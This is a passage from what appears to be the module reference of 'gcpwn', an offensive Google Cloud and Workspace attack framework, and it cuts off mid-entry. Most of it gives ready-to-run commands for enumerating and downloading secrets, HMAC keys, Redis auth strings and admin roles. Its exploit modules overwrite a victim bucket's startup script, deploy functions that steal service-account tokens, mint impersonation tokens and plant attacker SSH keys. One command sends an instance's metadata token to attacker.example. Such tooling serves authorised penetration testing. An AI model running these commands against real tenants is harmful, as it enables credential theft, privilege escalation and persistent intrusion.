--functions; manual--function-names(with--version 1|2); region scope--v1-regions/--v2-regions/--v1v2-regions|--regions-list|--regions-file;--get;--iam;--download(source bundles,--outputdir);--external-curl. Runmodules run enum_cloudfunctions -hfor full options. -
Example:
modules run enum_cloudfunctions --functions --v1v2-regions --download --external-curl gcpwn --module enum_cloudfunctions --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --functions --v1v2-regions --download --external-curl
-
Service Group:
Cloud Run -
What It Does: Enumerates Cloud Run services and jobs across regions, exposing each workload's runtime service account and trigger URL.
--downloadlists+gets service revisions and writes their ENV YAML (run.revisions.list/get), which frequently leaks secrets and config. -
Key Flags: Component selectors
--services/--jobs; manual--service-ids/--job-ids; region scope--all-regions|--regions-list|--regions-file;--get;--iam(services and jobs);--download(revision ENV YAML). Runmodules run enum_cloudrun -hfor full options. -
Example:
modules run enum_cloudrun --services --jobs --all-regions --download gcpwn --module enum_cloudrun --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --services --jobs --all-regions --download
-
Service Group:
Cloud SQL - What It Does: Enumerates Cloud SQL instances (project-scoped) and their databases and users, plus post-processed connection and config views over cached instances. Surfaces DB users, public-IP/authorized-network exposure, and connection details for direct database access.
-
Key Flags: Component selectors
--instances/--databases/--users; view flags--connections/--configs; manual--instance-names;--get. Runmodules run enum_cloudsql -hfor full options. -
Example:
modules run enum_cloudsql --instances --databases --users --connections --configs gcpwn --module enum_cloudsql --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instances --databases --users --connections --configs
-
Service Group:
Cloud Storage - What It Does: Enumerates Cloud Storage HMAC keys, buckets, and their blobs (standard API or HMAC/XML access mode), and can download blob contents. HMAC key secrets and bucket contents are prime loot; recovered HMAC credentials enable S3-compatible bucket access outside normal IAM.
-
Key Flags: Component selectors
--hmac_keys/--buckets/--blobs; manual--access-keys/--bucket-names/--blob-names(-file); HMAC access via--access-id+--hmac-secret(and--list-hmac-secrets);--get;--iam(buckets);--downloadwith--output/--file-size/--good-regex/--time-limit/--threads. Runmodules run enum_cloudstorage -hfor full options. -
Example:
modules run enum_cloudstorage --buckets --blobs --download --good-regex '.*\.(env|json|pem)$' --output loot/ gcpwn --module enum_cloudstorage --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --buckets --blobs --download --good-regex '.*\.(env|json|pem)$' --output loot/
-
Service Group:
Cloud Tasks - What It Does: Enumerates Cloud Tasks queues and the tasks within them per project+location, with optional download of each HTTP/App Engine task's request payload; the offensive angle is that tasks carry target URLs, headers, bodies, and the OIDC/OAuth service account a queue dispatches requests as.
-
Key Flags: Component selectors
--queues/--tasks(tasks nest under queues); region scope--all-regions|--regions-list|--regions-file;--get,--iam,--download(task request bodies to loot),--output; manual--queue-ids/--queue-ids-file. Runmodules run enum_cloudtasks -hfor full options. -
Example:
modules run enum_cloudtasks --queues --tasks --all-regions --iam --download gcpwn --module enum_cloudtasks --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --queues --tasks --all-regions --iam
-
Service Group:
Firestore - What It Does: Enumerates Firestore databases and top-level collections (and optionally security-rules metadata) for the current project, and can download collection documents. Exposes app data and rule misconfigurations that may permit unauthorized reads/writes.
-
Key Flags: component selectors
--databases/--collections(default: all),--rules(security rules metadata), manual--database-ids/--database-ids-file,--download(fetch collection documents; implies--collections),--download-limit N(0 = unlimited),--get,-v/--debug. Runmodules run enum_firestore -hfor full options. -
Example:
modules run enum_firestore --databases --rules --get gcpwn --module enum_firestore --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --databases --rules --get
-
Service Group:
GKE - What It Does: Enumerates GKE (Container API) clusters and their node pools per location. Reveals cluster config and the node-pool service accounts / metadata that are common Kubernetes-to-GCP privilege-escalation footholds.
-
Key Flags: component selectors
--clusters/--node-pools(default: all), region scope--all-regions|--regions-list <csv>|--regions-file <file>, manual--cluster-names(LOCATION/CLUSTER_ID or full name) /--node-pool-names,--get,-v/--debug. Runmodules run enum_gke -hfor full options. -
Example:
modules run enum_gke --clusters --node-pools --regions-list us-central1 gcpwn --module enum_gke --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --clusters --node-pools --regions-list us-central1
-
Service Group:
IAM - What It Does: Enumerates IAM service accounts (and per-SA keys), custom roles (project AND resolved-org scope), and Workload Identity Federation pools/providers — the SA principals and keys here are prime targets for impersonation/key theft, and WIF providers reveal external trust relationships. Optionally runs TestIamPermissions on service accounts.
-
Key Flags: component selectors
--service-accounts/--custom-roles/--pools/--providers(default all); manual ids--sa-account-names(projects/<pid>/serviceAccounts/<email>),--role-names/--role-names-file;--project/--orgto scope custom-role enumeration;--iam(TestIamPermissions on SAs);--get(fetch full SA keys / role definitions);-v/--debug. Runmodules run enum_iam -hfor full options. -
Example:
modules run enum_iam --service-accounts --get --iam gcpwn --module enum_iam --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --service-accounts --get --iam
-
Service Group:
Cloud KMS - What It Does: Enumerates the Cloud KMS hierarchy per region: keyrings, then crypto keys, then key versions. Discovered keys plus IAM checks reveal encrypt/decrypt/sign reach, a path to decrypting protected data or escalating via key-level bindings.
-
Key Flags: Component selectors
--keyrings/--keys/--versions; region scope--all-regions|--regions-list|--regions-file;--get;--iam(keyrings and keys). Runmodules run enum_kms -hfor full options. -
Example:
modules run enum_kms --keyrings --keys --versions --all-regions --iam gcpwn --module enum_kms --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --keyrings --keys --versions --all-regions --iam
-
Service Group:
Memorystore -
What It Does: Enumerates Memorystore for Redis instances (
redis_v1) and Redis Clusters (distinctredis_cluster_v1API) across regions, capturing host/port, state, and — notably —auth_enabledand the actualauth_string, exposing usable Redis credentials and reachable endpoints. -
Key Flags: component selectors
--instances/--clusters(default both); region scope--all-regions|--regions-list r1,r2|--regions-file <file>; manual ids--redis-instance-names(projects/<pid>/locations/<loc>/instances/<name>),--redis-cluster-names(LOCATION/CLUSTER_IDor full path);--get;-v/--debug. Runmodules run enum_memorystore -hfor full options. -
Example:
modules run enum_memorystore --instances --regions-list us-central1 gcpwn --module enum_memorystore --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instances --regions-list us-central1
-
Service Group:
Everything - What It Does: Enumerates IAM allow-policy bindings across already-cached resources (org/folder/project nodes plus per-service resources), capturing raw allow-policy JSON and normalized bindings and rebuilding the principal/member permission view. This is the data that drives who-can-do-what and privilege-escalation analysis.
-
Key Flags: per-service selectors
--resource-manager/--storage/--bigquery/--functions/--compute/--service-accounts/--secrets/--cloud-run/--cloud-tasks/--artifact-registry/--cloud-kms/--pubsub/--service-directory(default: all),--ensure-tree(auto-run resource discovery if hierarchy missing), scope group--scope-hierarchy/--scope-project <pid>/--scope-orphans,--no-sync-users,-v/--debug. Runmodules run enum_gcp_policy_bindings -hfor full options. -
Example:
modules run enum_gcp_policy_bindings --ensure-tree gcpwn --module enum_gcp_policy_bindings --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --ensure-tree
-
Service Group:
Pub/Sub - What It Does: Enumerates Pub/Sub topics, subscriptions, schemas, and snapshots in a project, recording each resource's KMS key, subscription filters/target topics, and optional TestIamPermissions results. Offensive angle: exposes messaging pipelines and their CMEK bindings, and subscriptions let you identify data flows you may be able to pull or hijack.
-
Key Flags: Component selectors
--topics,--subscriptions,--schemas,--snapshots(each with a manual-id arg:--topic-names,--subscription-names,--schema-names,--snapshot-names);--getfor per-resource detail;--iamto run TestIamPermissions;--debug. Runmodules run enum_pubsub -hfor full options. -
Example:
modules run enum_pubsub --topics --subscriptions --iam gcpwn --module enum_pubsub --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --topics --subscriptions --iam
-
Service Group:
Resource Manager - What It Does: Enumerates the GCP resource hierarchy (organizations, folders, projects) via search plus recursive list calls, building the org/folder/project tree and syncing discovered projects into the workspace. Offensive angle: maps the whole hierarchy for lateral movement/scoping and can brute-force the full TestIamPermissions catalog at org/folder/project scope to inventory your effective permissions.
-
Key Flags: Component selectors
--organizations,--folders,--projects;--iam(TestIamPermissions per resource);--all-permissions(test the larger permission catalog);--record-failed-permissions(force per-permission checks and write reusable failed-permission lists toscripts/);--no-recursive(skip recursive hierarchy walk);--get(fetch details and resolve missing parent names);--debug. Runmodules run enum_resources -hfor full options. -
Example:
modules run enum_resources --organizations --folders --projects --iam gcpwn --module enum_resources --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --organizations --folders --projects --iam
-
Service Group:
Secrets -
What It Does: Enumerates Secret Manager secrets and their versions, and can access/exfiltrate the actual secret payloads. Offensive angle:
--values/--downloadcalls AccessSecretVersion to read plaintext credentials, API keys, and other secrets, storing/downloading them locally. -
Key Flags: Component selectors
--secrets,--versions(versions auto-enable when values/download requested);--values(read secret payloads, sensitive);--download(write secret values to local files);--iam(TestIamPermissions on secrets and versions);--get;--debug; reserved--version-range. Runmodules run enum_secretsmanager -hfor full options. -
Example:
modules run enum_secretsmanager --secrets --values --download gcpwn --module enum_secretsmanager --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --secrets --values --download
-
Service Group:
Service Directory - What It Does: Enumerates Service Directory namespaces, services, and endpoints per region, capturing endpoint addresses, ports, and network bindings. Offensive angle: endpoint records reveal internal service network locations (IP/port/network) usable for lateral movement and reconnaissance.
-
Key Flags: Component selectors
--namespaces,--services,--endpoints; region scope--all-regions|--regions-list us-central1,us-east1|--regions-file;--iam(TestIamPermissions on namespaces and services; endpoints unsupported);--get;--debug. Runmodules run enum_servicedirectory -hfor full options. -
Example:
modules run enum_servicedirectory --namespaces --services --endpoints --regions-list us-central1 gcpwn --module enum_servicedirectory --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --namespaces --services --endpoints --regions-list us-central1
-
Service Group:
Storage Transfer - What It Does: Enumerates Storage Transfer Service jobs for a project, capturing job configs and their latest operation. Offensive angle: transfer jobs expose source/sink data movement configurations (e.g. bucket-to-bucket copy paths) useful for data-exfiltration reconnaissance.
-
Key Flags: Component selector
--transfer-jobswith manual-id arg--transfer-job-ids(shortmy-jobor fullprojects/PID/transferJobs/my-job);--get;--download(reserved, not yet implemented);--debug. No--iamsupport. Runmodules run enum_storagetransfer -hfor full options. -
Example:
modules run enum_storagetransfer --transfer-jobs --get gcpwn --module enum_storagetransfer --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --transfer-jobs --get
-
Service Group:
Cloud Scheduler - What It Does: Enumerates Cloud Scheduler jobs across locations, capturing each job's target and the service account email it authenticates as. Offensive angle: scheduler jobs run as a service account and fire HTTP/Pub/Sub targets, so a hijacked job can invoke arbitrary endpoints with that SA's identity.
-
Key Flags: Component selector
--jobswith manual-id arg--job-ids(LOCATION/JOB_IDor full name); region/location scope--all-regions|--regions-list us-central1,europe-west1|--regions-file;--get;--debug. No--iamsupport. Runmodules run enum_cloudscheduler -hfor full options. -
Example:
modules run enum_cloudscheduler --jobs --regions-list us-central1 gcpwn --module enum_cloudscheduler --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --jobs --regions-list us-central1
-
Service Group:
Cloud Workflows -
What It Does: Enumerates Cloud Workflows workflows across locations, capturing state, revision, call log level, CMEK key, and the service account each workflow runs as. Offensive angle: a workflow executes as its
service_account, so control over a workflow yields that SA's identity for privilege escalation/lateral movement. -
Key Flags: Component selector
--workflowswith manual-id arg--workflow-ids(LOCATION/WORKFLOW_IDor full name); region/location scope--all-regions|--regions-list us-central1|--regions-file;--get;--debug. No--iamsupport. Runmodules run enum_cloudworkflows -hfor full options. -
Example:
modules run enum_cloudworkflows --workflows --regions-list us-central1 gcpwn --module enum_cloudworkflows --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --workflows --regions-list us-central1
-
Service Group:
Cloud Spanner - What It Does: Enumerates Cloud Spanner instances and their databases in a project (read-only). Offensive angle: inventories managed relational databases and lets you test IAM permissions against instances/databases to identify data-access opportunities.
-
Key Flags: Component selectors
--instances(manual-id--instance-ids),--databases(manual-id--database-ids,INSTANCE_ID/DATABASE_IDor full name);--iam(TestIamPermissions on instances and databases);--get;--debug. Runmodules run enum_spanner -hfor full options. -
Example:
modules run enum_spanner --instances --databases --iam gcpwn --module enum_spanner --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instances --databases --iam
-
Service Group:
AlloyDB - What It Does: Enumerates AlloyDB clusters and their instances across locations. Offensive angle: inventories managed PostgreSQL-compatible clusters/instances (and their network/config metadata) for data-access reconnaissance.
-
Key Flags: Component selectors
--clusters(manual-id--cluster-ids,LOCATION/CLUSTER_ID),--instances(manual-id--instance-ids,LOCATION/CLUSTER_ID/INSTANCE_ID); region/location scope--all-regions|--regions-list us-central1|--regions-file;--get;--debug. No--iamsupport. Runmodules run enum_alloydb -hfor full options. -
Example:
modules run enum_alloydb --clusters --instances --regions-list us-central1 gcpwn --module enum_alloydb --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --clusters --instances --regions-list us-central1
-
Service Group:
Organization Policy -
What It Does: Enumerates the Organization Policy constraints in effect on the project (each stored with a rule summary), surfacing which guardrails are set or missing (e.g. whether
iam.disableServiceAccountKeyCreationorcompute.requireOsLoginare enforced) to gauge priv-esc opportunities. -
Key Flags:
--policiescomponent selector;--get; manual ids--policy-ids CONSTRAINT(or fullprojects/PROJECT_ID/policies/CONSTRAINT). Project-scoped, no region flags (supports_iam=False). Runmodules run enum_orgpolicy -hfor full options. -
Example:
modules run enum_orgpolicy --policies gcpwn --module enum_orgpolicy --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --policies
-
Service Group:
Cloud Asset Inventory -
What It Does: Runs a single Cloud Asset Inventory
list_assetsscan (RESOURCE + IAM_POLICY) over a project/folder/org scope and fans the results into the shared workspace tables (iam_allow_policies, abstract_tree_hierarchy, service accounts/keys/roles, compute instances, WIF pools/providers) — a force-multiplier that feeds OpenGraph and a fallback when per-service enum is denied butcloudasset.*is granted. -
Key Flags:
--scope projects/<id>|folders/<id>|organizations/<id>(default current project);--asset-types compute.googleapis.com/Instance,...comma-separated filter;-v/--debug. No component/region flags. Runmodules run enum_asset_inventory -hfor full options. -
Example:
modules run enum_asset_inventory --scope organizations/1234567890 gcpwn --module enum_asset_inventory --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --scope organizations/1234567890
-
Service Group:
Eventarc -
What It Does: Enumerates Eventarc triggers per region, capturing each trigger's
service_account— the identity a trigger invokes its destination as — plus its event filters/destination, surfacing an impersonation/priv-esc target. -
Key Flags:
--triggerscomponent selector; region scope--all-regions|--regions-list us-central1,europe-west1|--regions-file <file>;--get; manual ids--trigger-ids LOCATION/TRIGGER_ID. Runmodules run enum_eventarc -hfor full options. -
Example:
modules run enum_eventarc --triggers --all-regions gcpwn --module enum_eventarc --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --triggers --all-regions
-
Service Group:
Cloud Workstations -
What It Does: Enumerates Cloud Workstations clusters (regional), then the configs under each cluster and the workstations under each config (nested), capturing each config's
host.gce_instance.service_account— the identity dev workstations run as and a priv-esc target. -
Key Flags:
--clusters/--configs/--workstationscomponent selectors (configs/workstations are nested under their parents); region scope--all-regions|--regions-list us-central1|--regions-file <file>;--iam(TestIamPermissions on configs/workstations);--get. Runmodules run enum_workstations -hfor full options. -
Example:
modules run enum_workstations --clusters --configs --workstations --all-regions --iam gcpwn --module enum_workstations --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --clusters --configs --workstations --all-regions --iam
-
Service Group:
Cloud Billing - What It Does: Lists accessible (global, non-project-scoped) Cloud Billing accounts with a best-effort IAM admin member list per account, plus the current project's billing link/enabled state — surfacing billing admins who can attach/move project billing as a quiet privilege path.
-
Key Flags:
-v/--debugonly (no component/region/iam flags). Runmodules run enum_billing -hfor full options. -
Example:
modules run enum_billing gcpwn --module enum_billing --workspace WORKSPACE_NAME --cred CRED_NAME --current-project
-
Service Group:
Cloud Shell - What It Does: Fetches the calling principal's (per-user) Cloud Shell environment — SSH public keys, docker image, and host state — and persists it. Cloud Shell has no list API; service-account creds usually return 404/403 (handled gracefully), so this is most useful with user credentials.
-
Key Flags:
--environment users/me/environments/default(override the environment resource name);-v/--debug. Runmodules run enum_cloudshell -hfor full options. -
Example:
modules run enum_cloudshell gcpwn --module enum_cloudshell --workspace WORKSPACE_NAME --cred CRED_NAME --current-project
-
Service Group:
Cloud Logging -
What It Does: Lists the project's log 'groups' — sinks (with their export destination and
writer_identitySA), log buckets, log names, and log-based metrics — and can optionally download the newest entries per log to JSON, exposing exfil paths (sink writer SAs) and sensitive log content. -
Key Flags:
--download(fetch recent entries instead of just listing) with--download-limit N(default 1000, per log),--logs name1,name2to target specific logs,--output <dir>;-v/--debug. Runmodules run enum_logging -hfor full options. -
Example:
modules run enum_logging --download --download-limit 500 gcpwn --module enum_logging --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --download --download-limit 500
-
Service Group:
Dataproc -
What It Does: Enumerates Dataproc clusters and Dataproc Serverless batches per region, capturing the service account each runs as (
gce_cluster_config.service_account/execution_config.service_account) — the impersonation/priv-esc target for jobs submitted to them. -
Key Flags:
--clusters/--batchescomponent selectors; region scope--all-regions|--regions-list us-central1,us-east1|--regions-file <file>;-v/--debug(components havesupports_get=False,supports_iam=False). Runmodules run enum_dataproc -hfor full options. -
Example:
modules run enum_dataproc --clusters --batches --all-regions gcpwn --module enum_dataproc --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --clusters --batches --all-regions
-
Service Group:
Dataflow -
What It Does: Enumerates Dataflow jobs per region, capturing each job's worker service account (
environment.service_account_email) — the identity pipeline workers run as and an impersonation/priv-esc target — along with job type and current state. -
Key Flags:
--jobscomponent selector; region scope--all-regions|--regions-list us-central1|--regions-file <file>;-v/--debug(supports_get=False,supports_iam=False). Runmodules run enum_dataflow -hfor full options. -
Example:
modules run enum_dataflow --jobs --all-regions gcpwn --module enum_dataflow --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --jobs --all-regions
-
Service Group:
Vertex AI Workbench -
What It Does: Enumerates Vertex AI Workbench instances (notebooks_v2), capturing each instance's
proxy_uri, creator, and — the key offensive signal — the run-as service account fromgce_setup.service_accounts[0].email. A principal who can create/update/SSH/proxy into an instance effectively acts as that SA. -
Key Flags:
--instances(component selector),--instance-ids LOCATION/INSTANCE_ID(manual ids), region scope via--all-regions | --regions-list us-central1,us-east1 | --regions-file <path>,--get,--iam(per-instance testIamPermissions). Runmodules run enum_notebooks -hfor full options. -
Example:
modules run enum_notebooks --instances --regions-list us-central1 --iam gcpwn --module enum_notebooks --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instances --regions-list us-central1 --iam
-
Service Group:
Cloud Deploy -
What It Does: Enumerates Cloud Deploy delivery pipelines and targets (deploy_v1), recording each target's destination runtime (gke/run/anthos/...) and its ExecutionConfig
service_account. Rollouts run as that SA, so a principal able to modify targets/pipelines gains a deploy-as-SA primitive. -
Key Flags: component selectors
--delivery-pipelines/--targets, manual ids--pipeline-ids LOCATION/PIPELINE_ID/--target-ids LOCATION/TARGET_ID, region scope via--all-regions | --regions-list us-central1 | --regions-file <path>,--get,--iam(per-resource testIamPermissions). Runmodules run enum_clouddeploy -hfor full options. -
Example:
modules run enum_clouddeploy --targets --regions-list us-central1 --iam gcpwn --module enum_clouddeploy --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --targets --regions-list us-central1 --iam
-
Service Group:
BigQuery Data Transfer -
What It Does: Enumerates BigQuery Data Transfer Service transfer configs (bigquery_datatransfer_v1), surfacing recon-rich metadata:
data_source_id(what external data is pulled),destination_dataset_id(where it lands),schedule, andowner_info.email(as whom). Reveals cross-system data flows and the owning identity. -
Key Flags:
--transfer-configs(component selector),--config-ids LOCATION/CONFIG_ID(manual ids), region scope via--all-regions | --regions-list us-central1 | --regions-file <path>,--get. No--iam(the GAPIC client exposes no testIamPermissions). Runmodules run enum_bigquerydatatransfer -hfor full options. -
Example:
modules run enum_bigquerydatatransfer --transfer-configs --regions-list us-central1 --get gcpwn --module enum_bigquerydatatransfer --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --transfer-configs --regions-list us-central1 --get
-
Service Group:
Service Usage -
What It Does: Enumerates the APIs (services) enabled on a project via service_usage_v1 (filter
state:ENABLED). Foundational recon: tells you which services are reachable — and thus which other enum modules can return data — and which managed services (e.g. cloudfunctions, run) are live and worth probing for SA-impersonation / deploy-as-SA primitives. -
Key Flags:
--services(component selector). Project-scoped (no region flags). No--get/--iam(supports_get=False,supports_iam=False). Runmodules run enum_serviceusage -hfor full options. -
Example:
modules run enum_serviceusage --services gcpwn --module enum_serviceusage --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --services
These run once (tenant-scoped). A service account needs domain-wide delegation; set the admin subject via the workspace_admin_subject config (configs set workspace_admin_subject admin@your-domain.com) or --impersonate.
-
Service Group:
Google Workspace - What It Does: Enumerates Google Workspace / Cloud Identity groups, their memberships (optionally transitive), and Directory API users for a tenant. Maps group membership and identities that feed IAM group-based bindings and lateral-movement paths.
-
Key Flags: component selectors
--groups/--memberships/--users(default: all), tenant scope--customer-id C.../--org-id <numeric>/--parent customers/C...,--query(groups.search) /--filter(groups.list),--transitive(nested memberships),--view FULL|BASIC,--page-size,--directory-customer,--impersonate <admin@domain>(SA domain-wide delegation),--get,-v/--debug. Runmodules run enum_cloud_identity -hfor full options. -
Example:
modules run enum_cloud_identity --groups --memberships --customer-id C0xxxxxxx gcpwn --module enum_cloud_identity --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --groups --memberships --customer-id C0xxxxxxx
-
Service Group:
Google Workspace - What It Does: Enumerates Google Workspace admin roles (flagging super-admin and system roles) and their role assignments (who holds each role) via the Admin SDK Directory API. This is the highest attack-path-value Workspace data — it reveals super-admins and privileged delegated admins.
-
Key Flags: component selectors
--roles/--assignments(default: all), tenant scope--customer-id C.../--org-id <numeric>/--directory-customer,--user-key <email|id>(filter assignments to one user),--page-size,--impersonate <admin@domain>(SA domain-wide delegation),--get,-v/--debug. Runmodules run enum_admin_roles -hfor full options. -
Example:
modules run enum_admin_roles --roles --assignments --customer-id C0xxxxxxx --impersonate admin@example.com gcpwn --module enum_admin_roles --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --roles --assignments --customer-id C0xxxxxxx --impersonate admin@example.com
-
Service Group:
Google Workspace -
What It Does: Enumerates a Workspace tenant's organizational units via the Admin SDK Directory API (
orgunits.list), mapping the OU tree (paths, parents) that governs where users/devices live and how policies apply. Requires a Workspace admin user or a service account with domain-wide delegation. -
Key Flags:
--customer-id C...(Directory customer ID) or--org-id <numeric>to resolve it via Resource Manager;--directory-customer(API customer selector, defaultmy_customer/resolved);--type all|children;--impersonate admin@domain(SA domain-wide delegation, orconfigs set workspace_admin_subject);--get;-v/--debug. Runmodules run enum_org_units -hfor full options. -
Example:
modules run enum_org_units --customer-id C0xxxxxxx --impersonate admin@acme.com gcpwn --module enum_org_units --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --customer-id C0xxxxxxx --impersonate admin@acme.com
-
Service Group:
Google Workspace -
What It Does: Enumerates the domains registered to a Workspace tenant via the Admin SDK Directory API (
domains.list), surfacing primary/verified status — useful for scoping which email domains and identities belong to the target org. Requires a Workspace admin user or a service account with domain-wide delegation. -
Key Flags:
--customer-id C...or--org-id <numeric>to resolvedirectoryCustomerIdvia Resource Manager;--directory-customer(defaultmy_customer);--impersonate admin@domain(SA domain-wide delegation, orconfigs set workspace_admin_subject);--get;-v/--debug. Runmodules run enum_domains -hfor full options. -
Example:
modules run enum_domains --customer-id C0xxxxxxx --impersonate admin@acme.com gcpwn --module enum_domains --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --customer-id C0xxxxxxx --impersonate admin@acme.com
-
Service Group:
Google Workspace -
What It Does: Enumerates managed mobile devices in a Workspace tenant via the Admin SDK Directory API (
mobiledevices.list), returning owner email, model, OS, and status — inventory useful for targeting endpoints and identities. Requires a Workspace admin user or a service account with domain-wide delegation. -
Key Flags:
--customer-id C...(required, or--org-id <numeric>to resolve it);--directory-customer(API selector, default resolved/my_customer);--page-size N;--projection FULL|BASIC;--order-by;--impersonate admin@domain(SA domain-wide delegation);--get;-v/--debug. Runmodules run enum_mobile_devices -hfor full options. -
Example:
modules run enum_mobile_devices --customer-id C0xxxxxxx --projection FULL --impersonate admin@acme.com gcpwn --module enum_mobile_devices --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --customer-id C0xxxxxxx --projection FULL --impersonate admin@acme.com
-
Service Group:
Google Workspace -
What It Does: For each Workspace user (all cached
workspace_users, or a single--user-key), lists the 3rd-party OAuth applications they have authorized via the Admin SDK Directory API — surfacing over-privileged or anomalous app grants and their scope counts as an attack/persistence surface. Requires Workspace admin creds or SA domain-wide delegation. -
Key Flags:
--user-key user@domain(single user; default is all cachedworkspace_users);--customer-id C...or--org-id <numeric>;--impersonate admin@domain(SA domain-wide delegation, orconfigs set workspace_admin_subject);--get;-v/--debug. Runmodules run enum_oauth_tokens -hfor full options. -
Example:
modules run enum_oauth_tokens --impersonate admin@acme.com gcpwn --module enum_oauth_tokens --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --user-key victim@acme.com --impersonate admin@acme.com
-
Service Group:
Cloud Storage - What It Does: Authenticated write-access abuse: uploads a local file, base64 data string, or STDIN to an arbitrary object path in a target bucket (e.g. overwriting a script/config an app later reads). Supports HMAC (SigV4 XML) auth in addition to the session credential.
-
Key Flags:
--bucketand--remote-blob-path(destination),--local-blob-pathor--data-string-base64(payload source),--access-id+--hmac-secret(use an HMAC key instead of the session cred),-v/--debug. Runmodules run exploit_bucket_upload -hfor full options. -
Example:
modules run exploit_bucket_upload --bucket victim-configs --remote-blob-path deploy/startup.sh --local-blob-path ./payload.sh gcpwn --module exploit_bucket_upload --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --bucket victim-configs --remote-blob-path deploy/startup.sh --local-blob-path ./payload.sh
-
Service Group:
Cloud Functions -
What It Does: Creates/updates and/or invokes a Cloud Function running as an attacker-chosen (or the default editor) service account to exfiltrate that SA's metadata token; with
--assume-credsit parses the returned token and adds it as a new usable credential in the workspace. Uploads the bundledcodev1v2.zippayload (entry pointdata_exfil) to an enumerated bucket when no source is given. -
Key Flags:
--function-name projects/.../functions/<n>;--bucket-src gs://.../x.zip;--entry-point;--service-account <email>; version--v1/--v2; action--create/--update/--invoke;--assume-creds. Runmodules run exploit_functions_invoke -hfor full options. -
Example:
modules run exploit_functions_invoke --create --v2 --function-name projects/proj-id/locations/us-central1/functions/pwn --service-account victim-sa@proj-id.iam.gserviceaccount.com --invoke --assume-creds gcpwn --module exploit_functions_invoke --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --create --v2 --function-name projects/proj-id/locations/us-central1/functions/pwn --service-account victim-sa@proj-id.iam.gserviceaccount.com --invoke --assume-creds
-
Service Group:
IAM -
What It Does: Mints a short-lived OAuth2 access token for a target service account via
iamcredentials.generateAccessToken, either directly (iam.serviceAccounts.getAccessToken) or by walking impersonation/implicit-delegation chains discovered from cached IAM bindings; can then assume the token as a new credential for privilege escalation. -
Key Flags: mutually exclusive modes
--target-sa <sa>(direct token),--delegation <startSA>(step-through chain),--delegation-target <finalSA>(routes ending at a SA),--all-delegation(show every route);-v/--debug. With no flag it prompts interactively for a mode. Runmodules run exploit_generate_access_token -hfor full options. -
Example:
modules run exploit_generate_access_token --target-sa projects/proj1/serviceAccounts/app@proj1.iam.gserviceaccount.com gcpwn --module exploit_generate_access_token --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --target-sa projects/proj1/serviceAccounts/app@proj1.iam.gserviceaccount.com
-
Service Group:
Compute - What It Does: Adds an attacker SSH public key to Compute metadata to gain SSH access. Project-level metadata grants access to all instances in the project; instance-level targets a single VM (subject to OS Login / block-project-keys settings).
-
Key Flags:
--project-levelor--instance-level(placement),--instance-name(instance target),--ssh-key/--ssh-key-fileand--username(key identity),--brute(extra key-path handling),-v/--debug. Runmodules run exploit_instance_ssh_keys -hfor full options. -
Example:
modules run exploit_instance_ssh_keys --instance-level --instance-name web-1 --ssh-key-file ~/.ssh/id_ed25519.pub --username attacker gcpwn --module exploit_instance_ssh_keys --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instance-level --instance-name web-1 --ssh-key-file ~/.ssh/id_ed25519.pub --username attacker
-
Service Group:
Compute - What It Does: Creates a new instance, or updates an existing one via a stop/start, with a startup script that exfiltrates the VM's metadata (including the attached service account's access token) to a caller-controlled URL — i.e. code execution as the instance's service account.
-
Key Flags:
--create-new-instanceor--update-via-shutdown(execution path),--instance-name(target/new name),--startup-script-pathand--external-url(script + exfil endpoint),--service-account/--no-service-account(identity to attach),-v/--debug. Runmodules run exploit_instance_startup_script -hfor full options. -
Example:
modules run exploit_instance_startup_script --update-via-shutdown --instance-name batch-runner --external-url https://attacker.example/collect gcpwn --module exploit_instance_startup_script --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --update-via-shutdown --instance-name batch-runner --external-url https://attacker.example/collect
-
Service Group:
IAM -
What It Does: Creates, enables, or disables user-managed service account keys via the IAM Admin API — a newly created key (
iam.serviceAccountKeys.create) yields a durable, offline-usable credential for the target SA that can be immediately assumed for persistence/escalation. Enable/disable can also be used to reactivate or tamper with existing keys. -
Key Flags: mode
--create/--enable/--disable(mutually exclusive; prompts if omitted);--sa <projects/<pid>/serviceAccounts/<email>>(target SA, else prompts from cache);--sa-key <name>(key to enable/disable);--assume(assume created key credentials);-v/--debug. Runmodules run exploit_service_account_keys -hfor full options. -
Example:
